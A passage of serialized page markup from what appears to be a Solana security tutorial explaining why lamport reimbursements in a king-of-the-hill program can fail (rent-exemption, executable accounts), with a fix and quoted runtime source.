RentState",{"type":24,"tag":301,"props":79392,"children":79393},{"style":385},[79394],{"type":30,"value":10308},{"type":24,"tag":301,"props":79396,"children":79397},{"style":10246},[79398],{"type":30,"value":79075},{"type":24,"tag":301,"props":79400,"children":79401},{"style":385},[79402],{"type":30,"value":11095},{"type":24,"tag":301,"props":79404,"children":79405},{"style":10246},[79406],{"type":30,"value":79267},{"type":24,"tag":301,"props":79408,"children":79409},{"style":385},[79410],{"type":30,"value":10308},{"type":24,"tag":301,"props":79412,"children":79413},{"style":10246},[79414],{"type":30,"value":79276},{"type":24,"tag":301,"props":79416,"children":79417},{"style":385},[79418],{"type":30,"value":34508},{"type":24,"tag":301,"props":79420,"children":79421},{"style":348},[79422],{"type":30,"value":3613},{"type":24,"tag":301,"props":79424,"children":79425},{"style":359},[79426],{"type":30,"value":1729},{"type":24,"tag":301,"props":79428,"children":79429},{"class":303,"line":495},[79430,79434,79438,79442],{"type":24,"tag":301,"props":79431,"children":79432},{"style":10246},[79433],{"type":30,"value":79390},{"type":24,"tag":301,"props":79435,"children":79436},{"style":385},[79437],{"type":30,"value":10308},{"type":24,"tag":301,"props":79439,"children":79440},{"style":10246},[79441],{"type":30,"value":79304},{"type":24,"tag":301,"props":79443,"children":79444},{"style":359},[79445],{"type":30,"value":3035},{"type":24,"tag":301,"props":79447,"children":79448},{"class":303,"line":504},[79449,79454,79458,79463],{"type":24,"tag":301,"props":79450,"children":79451},{"style":369},[79452],{"type":30,"value":79453}," data_size",{"type":24,"tag":301,"props":79455,"children":79456},{"style":385},[79457],{"type":30,"value":1679},{"type":24,"tag":301,"props":79459,"children":79460},{"style":369},[79461],{"type":30,"value":79462}," pre_data_size",{"type":24,"tag":301,"props":79464,"children":79465},{"style":359},[79466],{"type":30,"value":1729},{"type":24,"tag":301,"props":79468,"children":79469},{"class":303,"line":512},[79470,79475,79479,79484],{"type":24,"tag":301,"props":79471,"children":79472},{"style":369},[79473],{"type":30,"value":79474}," lamports",{"type":24,"tag":301,"props":79476,"children":79477},{"style":385},[79478],{"type":30,"value":1679},{"type":24,"tag":301,"props":79480,"children":79481},{"style":369},[79482],{"type":30,"value":79483}," pre_lamports",{"type":24,"tag":301,"props":79485,"children":79486},{"style":359},[79487],{"type":30,"value":1729},{"type":24,"tag":301,"props":79489,"children":79490},{"class":303,"line":592},[79491,79496,79500],{"type":24,"tag":301,"props":79492,"children":79493},{"style":359},[79494],{"type":30,"value":79495}," } ",{"type":24,"tag":301,"props":79497,"children":79498},{"style":385},[79499],{"type":30,"value":4841},{"type":24,"tag":301,"props":79501,"children":79502},{"style":359},[79503],{"type":30,"value":3035},{"type":24,"tag":301,"props":79505,"children":79506},{"class":303,"line":619},[79507],{"type":24,"tag":301,"props":79508,"children":79509},{"style":1062},[79510],{"type":30,"value":79511}," // Cannot remain RentPaying if resized or credited.\n",{"type":24,"tag":301,"props":79513,"children":79514},{"class":303,"line":635},[79515,79520,79524,79528,79532,79536,79540],{"type":24,"tag":301,"props":79516,"children":79517},{"style":369},[79518],{"type":30,"value":79519}," post_data_size",{"type":24,"tag":301,"props":79521,"children":79522},{"style":385},[79523],{"type":30,"value":2460},{"type":24,"tag":301,"props":79525,"children":79526},{"style":369},[79527],{"type":30,"value":79462},{"type":24,"tag":301,"props":79529,"children":79530},{"style":385},[79531],{"type":30,"value":20977},{"type":24,"tag":301,"props":79533,"children":79534},{"style":369},[79535],{"type":30,"value":79346},{"type":24,"tag":301,"props":79537,"children":79538},{"style":385},[79539],{"type":30,"value":15012},{"type":24,"tag":301,"props":79541,"children":79542},{"style":369},[79543],{"type":30,"value":79544}," pre_lamports\n",{"type":24,"tag":301,"props":79546,"children":79547},{"class":303,"line":643},[79548],{"type":24,"tag":301,"props":79549,"children":79550},{"style":359},[79551],{"type":30,"value":77776},{"type":24,"tag":301,"props":79553,"children":79554},{"class":303,"line":652},[79555],{"type":24,"tag":301,"props":79556,"children":79557},{"style":359},[79558],{"type":30,"value":4211},{"type":24,"tag":301,"props":79560,"children":79561},{"class":303,"line":666},[79562],{"type":24,"tag":301,"props":79563,"children":79564},{"style":359},[79565],{"type":30,"value":65600},{"type":24,"tag":301,"props":79567,"children":79568},{"class":303,"line":674},[79569],{"type":24,"tag":301,"props":79570,"children":79571},{"style":359},[79572],{"type":30,"value":3345},{"type":24,"tag":301,"props":79574,"children":79575},{"class":303,"line":692},[79576],{"type":24,"tag":301,"props":79577,"children":79578},{"style":359},[79579],{"type":30,"value":501},{"type":24,"tag":32,"props":79581,"children":79582},{},[79583],{"type":30,"value":79584},"You can check the rent-exemption threshold for a zero-data account with the CLI:",{"type":24,"tag":291,"props":79586,"children":79588},{"className":11069,"code":79587,"language":11068,"meta":7,"style":7},"solana rent 0\nRent-exempt minimum: 0.00089088 SOL\n",[79589],{"type":24,"tag":145,"props":79590,"children":79591},{"__ignoreMap":7},[79592,79608],{"type":24,"tag":301,"props":79593,"children":79594},{"class":303,"line":304},[79595,79599,79604],{"type":24,"tag":301,"props":79596,"children":79597},{"style":314},[79598],{"type":30,"value":9717},{"type":24,"tag":301,"props":79600,"children":79601},{"style":329},[79602],{"type":30,"value":79603}," rent",{"type":24,"tag":301,"props":79605,"children":79606},{"style":466},[79607],{"type":30,"value":31034},{"type":24,"tag":301,"props":79609,"children":79610},{"class":303,"line":320},[79611,79616,79621,79626],{"type":24,"tag":301,"props":79612,"children":79613},{"style":314},[79614],{"type":30,"value":79615},"Rent-exempt",{"type":24,"tag":301,"props":79617,"children":79618},{"style":329},[79619],{"type":30,"value":79620}," minimum:",{"type":24,"tag":301,"props":79622,"children":79623},{"style":466},[79624],{"type":30,"value":79625}," 0.00089088",{"type":24,"tag":301,"props":79627,"children":79628},{"style":329},[79629],{"type":30,"value":79630}," SOL\n",{"type":24,"tag":270,"props":79632,"children":79634},{"id":79633},"fix-1-only-reimburse-if-rent-exempt",[79635],{"type":30,"value":79636},"Fix 1: Only Reimburse if Rent-Exempt",{"type":24,"tag":32,"props":79638,"children":79639},{},[79640],{"type":30,"value":79641},"We don't want to donate anything to an unfair king! So let's update our program to reimburse only if the old king will be rent-exempt after the transfer:",{"type":24,"tag":291,"props":79643,"children":79645},{"className":47096,"code":79644,"language":47098,"meta":7,"style":7},"let to_reimburse = (ctx.accounts.throne.last_bid_amount * 9500) / 10000;\n+let rent = Rent::get()?;\n+let balance_after = ctx.accounts.old_king.lamports() + to_reimburse;\n+if rent.is_exempt(balance_after, ctx.accounts.old_king.data_len()) {\n transfer_from_pda(\n &ctx.accounts.throne.to_account_info(),\n &ctx.accounts.old_king,\n to_reimburse,\n )?;\n+}\n",[79646],{"type":24,"tag":145,"props":79647,"children":79648},{"__ignoreMap":7},[79649,79657,79665,79673,79681,79689,79697,79705,79713,79721],{"type":24,"tag":301,"props":79650,"children":79651},{"class":303,"line":304},[79652],{"type":24,"tag":301,"props":79653,"children":79654},{"style":359},[79655],{"type":30,"value":79656},"let to_reimburse = (ctx.accounts.throne.last_bid_amount * 9500) / 10000;\n",{"type":24,"tag":301,"props":79658,"children":79659},{"class":303,"line":320},[79660],{"type":24,"tag":301,"props":79661,"children":79662},{"style":466},[79663],{"type":30,"value":79664},"+let rent = Rent::get()?;\n",{"type":24,"tag":301,"props":79666,"children":79667},{"class":303,"line":335},[79668],{"type":24,"tag":301,"props":79669,"children":79670},{"style":466},[79671],{"type":30,"value":79672},"+let balance_after = ctx.accounts.old_king.lamports() + to_reimburse;\n",{"type":24,"tag":301,"props":79674,"children":79675},{"class":303,"line":344},[79676],{"type":24,"tag":301,"props":79677,"children":79678},{"style":466},[79679],{"type":30,"value":79680},"+if rent.is_exempt(balance_after, ctx.accounts.old_king.data_len()) {\n",{"type":24,"tag":301,"props":79682,"children":79683},{"class":303,"line":401},[79684],{"type":24,"tag":301,"props":79685,"children":79686},{"style":359},[79687],{"type":30,"value":79688}," transfer_from_pda(\n",{"type":24,"tag":301,"props":79690,"children":79691},{"class":303,"line":415},[79692],{"type":24,"tag":301,"props":79693,"children":79694},{"style":359},[79695],{"type":30,"value":79696}," &ctx.accounts.throne.to_account_info(),\n",{"type":24,"tag":301,"props":79698,"children":79699},{"class":303,"line":439},[79700],{"type":24,"tag":301,"props":79701,"children":79702},{"style":359},[79703],{"type":30,"value":79704}," &ctx.accounts.old_king,\n",{"type":24,"tag":301,"props":79706,"children":79707},{"class":303,"line":447},[79708],{"type":24,"tag":301,"props":79709,"children":79710},{"style":359},[79711],{"type":30,"value":79712}," to_reimburse,\n",{"type":24,"tag":301,"props":79714,"children":79715},{"class":303,"line":476},[79716],{"type":24,"tag":301,"props":79717,"children":79718},{"style":359},[79719],{"type":30,"value":79720}," )?;\n",{"type":24,"tag":301,"props":79722,"children":79723},{"class":303,"line":495},[79724],{"type":24,"tag":301,"props":79725,"children":79726},{"style":466},[79727],{"type":30,"value":79728},"+}\n",{"type":24,"tag":32,"props":79730,"children":79731},{},[79732],{"type":30,"value":79733},"But is rent-exemption the only thing that can cause a lamport transfer to fail? Not quite.",{"type":24,"tag":80,"props":79735,"children":79737},{"id":79736},"bug-2-writable-but-untouchable-set_lamports-fails",[79738,79740,79746],{"type":30,"value":79739},"Bug 2: Writable but Untouchable — ",{"type":24,"tag":145,"props":79741,"children":79743},{"className":79742},[],[79744],{"type":30,"value":79745},"set_lamports",{"type":30,"value":79747}," Fails",{"type":24,"tag":32,"props":79749,"children":79750},{},[79751,79753,79760],{"type":30,"value":79752},"Let's look at ",{"type":24,"tag":188,"props":79754,"children":79757},{"href":79755,"rel":79756},"https://github.com/anza-xyz/agave/blob/f389dd23067e37d756c3f9d2f3d50e339dad7053/transaction-context/src/lib.rs#L863-L885",[192],[79758],{"type":30,"value":79759},"BorrowedAccount::set_lamports",{"type":30,"value":206},{"type":24,"tag":291,"props":79762,"children":79764},{"className":9818,"code":79763,"language":9817,"meta":7,"style":7},"/// Overwrites the number of lamports of this account (transaction wide)\n#[cfg(not(target_os = \"solana\"))]\npub fn set_lamports(&mut self, lamports: u64) -> Result\u003C(), InstructionError> {\n // An account not owned by the program cannot have its balance decrease\n if !self.is_owned_by_current_program() && lamports \u003C self.get_lamports() {\n return Err(InstructionError::ExternalAccountLamportSpend);\n }\n // The balance of read-only may not change\n if !self.is_writable() {\n return Err(InstructionError::ReadonlyLamportChange);\n }\n // The balance of executable accounts may not change\n if self.is_executable_internal() {\n return Err(InstructionError::ExecutableLamportChange);\n }\n // don't touch the account if the lamports do not change\n if self.get_lamports() == lamports {\n return Ok(());\n }\n self.touch()?;\n self.account.set_lamports(lamports);\n Ok(())\n}\n\n/// Feature gating to remove `is_executable` flag related checks\n#[cfg(not(target_os = \"solana\"))]\n#[inline]\nfn is_executable_internal(&self) -> bool {\n !self\n .transaction_context\n .remove_accounts_executable_flag_checks\n && self.account.executable()\n}\n\n",[79765],{"type":24,"tag":145,"props":79766,"children":79767},{"__ignoreMap":7},[79768,79776,79797,79869,79877,79935,79967,79974,79982,80010,80042,80049,80057,80081,80113,80120,80128,80163,80179,80186,80214,80249,80260,80267,80274,80282,80301,80309,80349,80361,80373,80385,80416],{"type":24,"tag":301,"props":79769,"children":79770},{"class":303,"line":304},[79771],{"type":24,"tag":301,"props":79772,"children":79773},{"style":1062},[79774],{"type":30,"value":79775},"/// Overwrites the number of lamports of this account (transaction wide)\n",{"type":24,"tag":301,"props":79777,"children":79778},{"class":303,"line":320},[79779,79784,79788,79793],{"type":24,"tag":301,"props":79780,"children":79781},{"style":359},[79782],{"type":30,"value":79783},"#[cfg(not(target_os ",{"type":24,"tag":301,"props":79785,"children":79786},{"style":385},[79787],{"type":30,"value":523},{"type":24,"tag":301,"props":79789,"children":79790},{"style":329},[79791],{"type":30,"value":79792}," \"solana\"",{"type":24,"tag":301,"props":79794,"children":79795},{"style":359},[79796],{"type":30,"value":27379},{"type":24,"tag":301,"props":79798,"children":79799},{"class":303,"line":335},[79800,79804,79808,79813,79817,79821,79825,79829,79833,79837,79841,79845,79849,79853,79857,79861,79865],{"type":24,"tag":301,"props":79801,"children":79802},{"style":348},[79803],{"type":30,"value":20484},{"type":24,"tag":301,"props":79805,"children":79806},{"style":348},[79807],{"type":30,"value":20489},{"type":24,"tag":301,"props":79809,"children":79810},{"style":314},[79811],{"type":30,"value":79812}," set_lamports",{"type":24,"tag":301,"props":79814,"children":79815},{"style":359},[79816],{"type":30,"value":362},{"type":24,"tag":301,"props":79818,"children":79819},{"style":385},[79820],{"type":30,"value":556},{"type":24,"tag":301,"props":79822,"children":79823},{"style":348},[79824],{"type":30,"value":10550},{"type":24,"tag":301,"props":79826,"children":79827},{"style":348},[79828],{"type":30,"value":20590},{"type":24,"tag":301,"props":79830,"children":79831},{"style":359},[79832],{"type":30,"value":377},{"type":24,"tag":301,"props":79834,"children":79835},{"style":369},[79836],{"type":30,"value":22300},{"type":24,"tag":301,"props":79838,"children":79839},{"style":385},[79840],{"type":30,"value":1679},{"type":24,"tag":301,"props":79842,"children":79843},{"style":10246},[79844],{"type":30,"value":12680},{"type":24,"tag":301,"props":79846,"children":79847},{"style":359},[79848],{"type":30,"value":911},{"type":24,"tag":301,"props":79850,"children":79851},{"style":385},[79852],{"type":30,"value":882},{"type":24,"tag":301,"props":79854,"children":79855},{"style":10246},[79856],{"type":30,"value":20555},{"type":24,"tag":301,"props":79858,"children":79859},{"style":359},[79860],{"type":30,"value":20560},{"type":24,"tag":301,"props":79862,"children":79863},{"style":10246},[79864],{"type":30,"value":22544},{"type":24,"tag":301,"props":79866,"children":79867},{"style":359},[79868],{"type":30,"value":14097},{"type":24,"tag":301,"props":79870,"children":79871},{"class":303,"line":344},[79872],{"type":24,"tag":301,"props":79873,"children":79874},{"style":1062},[79875],{"type":30,"value":79876}," // An account not owned by the program cannot have its balance decrease\n",{"type":24,"tag":301,"props":79878,"children":79879},{"class":303,"line":401},[79880,79884,79888,79892,79896,79901,79905,79909,79914,79918,79922,79926,79931],{"type":24,"tag":301,"props":79881,"children":79882},{"style":308},[79883],{"type":30,"value":453},{"type":24,"tag":301,"props":79885,"children":79886},{"style":385},[79887],{"type":30,"value":19659},{"type":24,"tag":301,"props":79889,"children":79890},{"style":348},[79891],{"type":30,"value":20507},{"type":24,"tag":301,"props":79893,"children":79894},{"style":385},[79895],{"type":30,"value":206},{"type":24,"tag":301,"props":79897,"children":79898},{"style":314},[79899],{"type":30,"value":79900},"is_owned_by_current_program",{"type":24,"tag":301,"props":79902,"children":79903},{"style":359},[79904],{"type":30,"value":20835},{"type":24,"tag":301,"props":79906,"children":79907},{"style":385},[79908],{"type":30,"value":5639},{"type":24,"tag":301,"props":79910,"children":79911},{"style":369},[79912],{"type":30,"value":79913}," lamports",{"type":24,"tag":301,"props":79915,"children":79916},{"style":385},[79917],{"type":30,"value":3950},{"type":24,"tag":301,"props":79919,"children":79920},{"style":348},[79921],{"type":30,"value":20590},{"type":24,"tag":301,"props":79923,"children":79924},{"style":385},[79925],{"type":30,"value":206},{"type":24,"tag":301,"props":79927,"children":79928},{"style":314},[79929],{"type":30,"value":79930},"get_lamports",{"type":24,"tag":301,"props":79932,"children":79933},{"style":359},[79934],{"type":30,"value":3883},{"type":24,"tag":301,"props":79936,"children":79937},{"class":303,"line":415},[79938,79942,79946,79950,79954,79958,79963],{"type":24,"tag":301,"props":79939,"children":79940},{"style":308},[79941],{"type":30,"value":482},{"type":24,"tag":301,"props":79943,"children":79944},{"style":10246},[79945],{"type":30,"value":22535},{"type":24,"tag":301,"props":79947,"children":79948},{"style":359},[79949],{"type":30,"value":362},{"type":24,"tag":301,"props":79951,"children":79952},{"style":10246},[79953],{"type":30,"value":22544},{"type":24,"tag":301,"props":79955,"children":79956},{"style":385},[79957],{"type":30,"value":10308},{"type":24,"tag":301,"props":79959,"children":79960},{"style":10246},[79961],{"type":30,"value":79962},"ExternalAccountLamportSpend",{"type":24,"tag":301,"props":79964,"children":79965},{"style":359},[79966],{"type":30,"value":589},{"type":24,"tag":301,"props":79968,"children":79969},{"class":303,"line":439},[79970],{"type":24,"tag":301,"props":79971,"children":79972},{"style":359},[79973],{"type":30,"value":501},{"type":24,"tag":301,"props":79975,"children":79976},{"class":303,"line":447},[79977],{"type":24,"tag":301,"props":79978,"children":79979},{"style":1062},[79980],{"type":30,"value":79981}," // The balance of read-only may not change\n",{"type":24,"tag":301,"props":79983,"children":79984},{"class":303,"line":476},[79985,79989,79993,79997,80001,80006],{"type":24,"tag":301,"props":79986,"children":79987},{"style":308},[79988],{"type":30,"value":453},{"type":24,"tag":301,"props":79990,"children":79991},{"style":385},[79992],{"type":30,"value":19659},{"type":24,"tag":301,"props":79994,"children":79995},{"style":348},[79996],{"type":30,"value":20507},{"type":24,"tag":301,"props":79998,"children":79999},{"style":385},[80000],{"type":30,"value":206},{"type":24,"tag":301,"props":80002,"children":80003},{"style":314},[80004],{"type":30,"value":80005},"is_writable",{"type":24,"tag":301,"props":80007,"children":80008},{"style":359},[80009],{"type":30,"value":3883},{"type":24,"tag":301,"props":80011,"children":80012},{"class":303,"line":495},[80013,80017,80021,80025,80029,80033,80038],{"type":24,"tag":301,"props":80014,"children":80015},{"style":308},[80016],{"type":30,"value":482},{"type":24,"tag":301,"props":80018,"children":80019},{"style":10246},[80020],{"type":30,"value":22535},{"type":24,"tag":301,"props":80022,"children":80023},{"style":359},[80024],{"type":30,"value":362},{"type":24,"tag":301,"props":80026,"children":80027},{"style":10246},[80028],{"type":30,"value":22544},{"type":24,"tag":301,"props":80030,"children":80031},{"style":385},[80032],{"type":30,"value":10308},{"type":24,"tag":301,"props":80034,"children":80035},{"style":10246},[80036],{"type":30,"value":80037},"ReadonlyLamportChange",{"type":24,"tag":301,"props":80039,"children":80040},{"style":359},[80041],{"type":30,"value":589},{"type":24,"tag":301,"props":80043,"children":80044},{"class":303,"line":504},[80045],{"type":24,"tag":301,"props":80046,"children":80047},{"style":359},[80048],{"type":30,"value":501},{"type":24,"tag":301,"props":80050,"children":80051},{"class":303,"line":512},[80052],{"type":24,"tag":301,"props":80053,"children":80054},{"style":1062},[80055],{"type":30,"value":80056}," // The balance of executable accounts may not change\n",{"type":24,"tag":301,"props":80058,"children":80059},{"class":303,"line":592},[80060,80064,80068,80072,80077],{"type":24,"tag":301,"props":80061,"children":80062},{"style":308},[80063],{"type":30,"value":453},{"type":24,"tag":301,"props":80065,"children":80066},{"style":348},[80067],{"type":30,"value":20590},{"type":24,"tag":301,"props":80069,"children":80070},{"style":385},[80071],{"type":30,"value":206},{"type":24,"tag":301,"props":80073,"children":80074},{"style":314},[80075],{"type":30,"value":80076},"is_executable_internal",{"type":24,"tag":301,"props":80078,"children":80079},{"style":359},[80080],{"type":30,"value":3883},{"type":24,"tag":301,"props":80082,"children":80083},{"class":303,"line":619},[80084,80088,80092,80096,80100,80104,80109],{"type":24,"tag":301,"props":80085,"children":80086},{"style":308},[80087],{"type":30,"value":482},{"type":24,"tag":301,"props":80089,"children":80090},{"style":10246},[80091],{"type":30,"value":22535},{"type":24,"tag":301,"props":80093,"children":80094},{"style":359},[80095],{"type":30,"value":362},{"type":24,"tag":301,"props":80097,"children":80098},{"style":10246},[80099],{"type":30,"value":22544},{"type":24,"tag":301,"props":80101,"children":80102},{"style":385},[80103],{"type":30,"value":10308},{"type":24,"tag":301,"props":80105,"children":80106},{"style":10246},[80107],{"type":30,"value":80108},"ExecutableLamportChange",{"type":24,"tag":301,"props":80110,"children":80111},{"style":359},[80112],{"type":30,"value":589},{"type":24,"tag":301,"props":80114,"children":80115},{"class":303,"line":635},[80116],{"type":24,"tag":301,"props":80117,"children":80118},{"style":359},[80119],{"type":30,"value":501},{"type":24,"tag":301,"props":80121,"children":80122},{"class":303,"line":643},[80123],{"type":24,"tag":301,"props":80124,"children":80125},{"style":1062},[80126],{"type":30,"value":80127}," // don't touch the account if the lamports do not change\n",{"type":24,"tag":301,"props":80129,"children":80130},{"class":303,"line":652},[80131,80135,80139,80143,80147,80151,80155,80159],{"type":24,"tag":301,"props":80132,"children":80133},{"style":308},[80134],{"type":30,"value":453},{"type":24,"tag":301,"props":80136,"children":80137},{"style":348},[80138],{"type":30,"value":20590},{"type":24,"tag":301,"props":80140,"children":80141},{"style":385},[80142],{"type":30,"value":206},{"type":24,"tag":301,"props":80144,"children":80145},{"style":314},[80146],{"type":30,"value":79930},{"type":24,"tag":301,"props":80148,"children":80149},{"style":359},[80150],{"type":30,"value":20835},{"type":24,"tag":301,"props":80152,"children":80153},{"style":385},[80154],{"type":30,"value":607},{"type":24,"tag":301,"props":80156,"children":80157},{"style":369},[80158],{"type":30,"value":79913},{"type":24,"tag":301,"props":80160,"children":80161},{"style":359},[80162],{"type":30,"value":3035},{"type":24,"tag":301,"props":80164,"children":80165},{"class":303,"line":666},[80166,80170,80174],{"type":24,"tag":301,"props":80167,"children":80168},{"style":308},[80169],{"type":30,"value":482},{"type":24,"tag":301,"props":80171,"children":80172},{"style":10246},[80173],{"type":30,"value":49673},{"type":24,"tag":301,"props":80175,"children":80176},{"style":359},[80177],{"type":30,"value":80178},"(());\n",{"type":24,"tag":301,"props":80180,"children":80181},{"class":303,"line":674},[80182],{"type":24,"tag":301,"props":80183,"children":80184},{"style":359},[80185],{"type":30,"value":501},{"type":24,"tag":301,"props":80187,"children":80188},{"class":303,"line":692},[80189,80193,80197,80202,80206,80210],{"type":24,"tag":301,"props":80190,"children":80191},{"style":348},[80192],{"type":30,"value":27555},{"type":24,"tag":301,"props":80194,"children":80195},{"style":385},[80196],{"type":30,"value":206},{"type":24,"tag":301,"props":80198,"children":80199},{"style":314},[80200],{"type":30,"value":80201},"touch",{"type":24,"tag":301,"props":80203,"children":80204},{"style":359},[80205],{"type":30,"value":20672},{"type":24,"tag":301,"props":80207,"children":80208},{"style":385},[80209],{"type":30,"value":2003},{"type":24,"tag":301,"props":80211,"children":80212},{"style":359},[80213],{"type":30,"value":492},{"type":24,"tag":301,"props":80215,"children":80216},{"class":303,"line":3631},[80217,80221,80225,80229,80233,80237,80241,80245],{"type":24,"tag":301,"props":80218,"children":80219},{"style":348},[80220],{"type":30,"value":27555},{"type":24,"tag":301,"props":80222,"children":80223},{"style":385},[80224],{"type":30,"value":206},{"type":24,"tag":301,"props":80226,"children":80227},{"style":359},[80228],{"type":30,"value":19748},{"type":24,"tag":301,"props":80230,"children":80231},{"style":385},[80232],{"type":30,"value":206},{"type":24,"tag":301,"props":80234,"children":80235},{"style":314},[80236],{"type":30,"value":79745},{"type":24,"tag":301,"props":80238,"children":80239},{"style":359},[80240],{"type":30,"value":362},{"type":24,"tag":301,"props":80242,"children":80243},{"style":369},[80244],{"type":30,"value":22300},{"type":24,"tag":301,"props":80246,"children":80247},{"style":359},[80248],{"type":30,"value":589},{"type":24,"tag":301,"props":80250,"children":80251},{"class":303,"line":3639},[80252,80256],{"type":24,"tag":301,"props":80253,"children":80254},{"style":10246},[80255],{"type":30,"value":21125},{"type":24,"tag":301,"props":80257,"children":80258},{"style":359},[80259],{"type":30,"value":21130},{"type":24,"tag":301,"props":80261,"children":80262},{"class":303,"line":3647},[80263],{"type":24,"tag":301,"props":80264,"children":80265},{"style":359},[80266],{"type":30,"value":698},{"type":24,"tag":301,"props":80268,"children":80269},{"class":303,"line":3685},[80270],{"type":24,"tag":301,"props":80271,"children":80272},{"emptyLinePlaceholder":16},[80273],{"type":30,"value":341},{"type":24,"tag":301,"props":80275,"children":80276},{"class":303,"line":3713},[80277],{"type":24,"tag":301,"props":80278,"children":80279},{"style":1062},[80280],{"type":30,"value":80281},"/// Feature gating to remove `is_executable` flag related checks\n",{"type":24,"tag":301,"props":80283,"children":80284},{"class":303,"line":3721},[80285,80289,80293,80297],{"type":24,"tag":301,"props":80286,"children":80287},{"style":359},[80288],{"type":30,"value":79783},{"type":24,"tag":301,"props":80290,"children":80291},{"style":385},[80292],{"type":30,"value":523},{"type":24,"tag":301,"props":80294,"children":80295},{"style":329},[80296],{"type":30,"value":79792},{"type":24,"tag":301,"props":80298,"children":80299},{"style":359},[80300],{"type":30,"value":27379},{"type":24,"tag":301,"props":80302,"children":80303},{"class":303,"line":3751},[80304],{"type":24,"tag":301,"props":80305,"children":80306},{"style":359},[80307],{"type":30,"value":80308},"#[inline]\n",{"type":24,"tag":301,"props":80310,"children":80311},{"class":303,"line":3782},[80312,80316,80321,80325,80329,80333,80337,80341,80345],{"type":24,"tag":301,"props":80313,"children":80314},{"style":348},[80315],{"type":30,"value":27037},{"type":24,"tag":301,"props":80317,"children":80318},{"style":314},[80319],{"type":30,"value":80320}," is_executable_internal",{"type":24,"tag":301,"props":80322,"children":80323},{"style":359},[80324],{"type":30,"value":362},{"type":24,"tag":301,"props":80326,"children":80327},{"style":385},[80328],{"type":30,"value":556},{"type":24,"tag":301,"props":80330,"children":80331},{"style":348},[80332],{"type":30,"value":20507},{"type":24,"tag":301,"props":80334,"children":80335},{"style":359},[80336],{"type":30,"value":911},{"type":24,"tag":301,"props":80338,"children":80339},{"style":385},[80340],{"type":30,"value":882},{"type":24,"tag":301,"props":80342,"children":80343},{"style":10246},[80344],{"type":30,"value":18848},{"type":24,"tag":301,"props":80346,"children":80347},{"style":359},[80348],{"type":30,"value":3035},{"type":24,"tag":301,"props":80350,"children":80351},{"class":303,"line":3791},[80352,80356],{"type":24,"tag":301,"props":80353,"children":80354},{"style":385},[80355],{"type":30,"value":27739},{"type":24,"tag":301,"props":80357,"children":80358},{"style":348},[80359],{"type":30,"value":80360},"self\n",{"type":24,"tag":301,"props":80362,"children":80363},{"class":303,"line":3819},[80364,80368],{"type":24,"tag":301,"props":80365,"children":80366},{"style":385},[80367],{"type":30,"value":74972},{"type":24,"tag":301,"props":80369,"children":80370},{"style":359},[80371],{"type":30,"value":80372},"transaction_context\n",{"type":24,"tag":301,"props":80374,"children":80375},{"class":303,"line":4397},[80376,80380],{"type":24,"tag":301,"props":80377,"children":80378},{"style":385},[80379],{"type":30,"value":74972},{"type":24,"tag":301,"props":80381,"children":80382},{"style":359},[80383],{"type":30,"value":80384},"remove_accounts_executable_flag_checks\n",{"type":24,"tag":301,"props":80386,"children":80387},{"class":303,"line":4405},[80388,80392,80396,80400,80404,80408,80412],{"type":24,"tag":301,"props":80389,"children":80390},{"style":385},[80391],{"type":30,"value":49537},{"type":24,"tag":301,"props":80393,"children":80394},{"style":348},[80395],{"type":30,"value":20590},{"type":24,"tag":301,"props":80397,"children":80398},{"style":385},[80399],{"type":30,"value":206},{"type":24,"tag":301,"props":80401,"children":80402},{"style":359},[80403],{"type":30,"value":19748},{"type":24,"tag":301,"props":80405,"children":80406},{"style":385},[80407],{"type":30,"value":206},{"type":24,"tag":301,"props":80409,"children":80410},{"style":314},[80411],{"type":30,"value":22444},{"type":24,"tag":301,"props":80413,"children":80414},{"style":359},[80415],{"type":30,"value":14551},{"type":24,"tag":301,"props":80417,"children":80418},{"class":303,"line":4422},[80419],{"type":24,"tag":301,"props":80420,"children":80421},{"style":359},[80422],{"type":30,"value":698},{"type":24,"tag":32,"props":80424,"children":80425},{},[80426],{"type":30,"value":80427},"Turns out: even writable, rent-exempt accounts can still reject lamport transfers.",{"type":24,"tag":32,"props":80429,"children":80430},{},[80431,80433,80438],{"type":30,"value":80432},"Specifically, ",{"type":24,"tag":60,"props":80434,"children":80435},{},[80436],{"type":30,"value":80437},"executable accounts",{"type":30,"value":80439}," cannot receive or send lamports — the runtime treats them as immutable.",{"type":24,"tag":270,"props":80441,"children":80443},{"id":80442},"sidebar-whats-the-executable-flag-anyway",[80444],{"type":30,"value":80445},"Sidebar: What's the executable Flag Anyway?",{"type":24,"tag":32,"props":80447,"children":80448},{},[80449,80450,80455],{"type":30,"value":8079},{"type":24,"tag":145,"props":80451,"children":80453},{"className":80452},[],[80454],{"type":30,"value":22444},{"type":30,"value":80456}," flag is a legacy mechanism marking accounts that hold program code. Historically, an account with this flag was assumed to either contain immutable BPF bytecode or was a proxy to a built-in program, and therefore it made sense to consider it read-only for performance reasons.",{"type":24,"tag":32,"props":80458,"children":80459},{},[80460,80462,80467],{"type":30,"value":80461},"This behavior became problematic with the introduction of the ",{"type":24,"tag":60,"props":80463,"children":80464},{},[80465],{"type":30,"value":80466},"Upgradeable BPF Loader",{"type":30,"value":80468},". A workaround was used to maintain compatibility with the existing runtime logic. The program data containing bpf bytecode was split into a separate account, ProgramData, with the program account now only containing an address pointing to the ProgramData account:",{"type":24,"tag":291,"props":80470,"children":80472},{"className":9818,"code":80471,"language":9817,"meta":7,"style":7},"Program {\n /// Address of the ProgramData account.\n programdata_address: Pubkey,\n},\nProgramData {\n /// Slot that the program was last modified.\n slot: u64,\n /// Address of the Program's upgrade authority.\n upgrade_authority_address: Option\u003CPubkey>,\n // The raw program data follows this serialized structure in the\n // account's data.\n},\n",[80473],{"type":24,"tag":145,"props":80474,"children":80475},{"__ignoreMap":7},[80476,80488,80496,80516,80524,80536,80544,80564,80572,80600,80608,80616],{"type":24,"tag":301,"props":80477,"children":80478},{"class":303,"line":304},[80479,80484],{"type":24,"tag":301,"props":80480,"children":80481},{"style":10246},[80482],{"type":30,"value":80483},"Program",{"type":24,"tag":301,"props":80485,"children":80486},{"style":359},[80487],{"type":30,"value":3035},{"type":24,"tag":301,"props":80489,"children":80490},{"class":303,"line":320},[80491],{"type":24,"tag":301,"props":80492,"children":80493},{"style":1062},[80494],{"type":30,"value":80495}," /// Address of the ProgramData account.\n",{"type":24,"tag":301,"props":80497,"children":80498},{"class":303,"line":335},[80499,80504,80508,80512],{"type":24,"tag":301,"props":80500,"children":80501},{"style":369},[80502],{"type":30,"value":80503}," 